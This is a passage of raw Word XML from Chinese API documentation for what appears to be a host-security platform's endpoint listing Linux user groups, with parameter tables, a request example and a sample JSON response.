          <w:p w14:paraId="058B4F2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C68DFBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E5C3B8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6365DE59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="176A966F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C97799E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A217280" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103252A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75995BFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CC42FBD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F19E9AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50268B61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71BDFA0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="202EC18E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69AC9240" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D68469E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3469F6E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603133FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA43C5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08CA377E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C73929E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18CC8A6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E70E99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3027FAB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A3969FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50BF9DA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621041C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B8198E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45B92125" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组id（仅支持</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37A44882" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E7A25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320ABE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F2A7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"qingteng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "members":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name":"qt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name":"syslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBDBD2D"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="3422"/>
        <w:gridCol w:w="4312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FAC5ED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00F30EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D4DC2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E0F6949" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1047058B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32A7923A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BE500A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A1180DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C88F047" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C76BFC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27454272" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A1949C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECF00D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365FD541" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1584EB58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30C2308C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2712E116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A51E262" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526697D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DB6BC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27D0A18B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24CD2561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1FCEC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="784BBE1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC9766B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12AB4C6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D20D98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A602741" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35CEDACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BACE3C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ACE74EF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509F79C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="110F2654" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3E1AFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229E37C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00E28C2C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D68ABAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="438EBDD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56152769" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0495C63C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
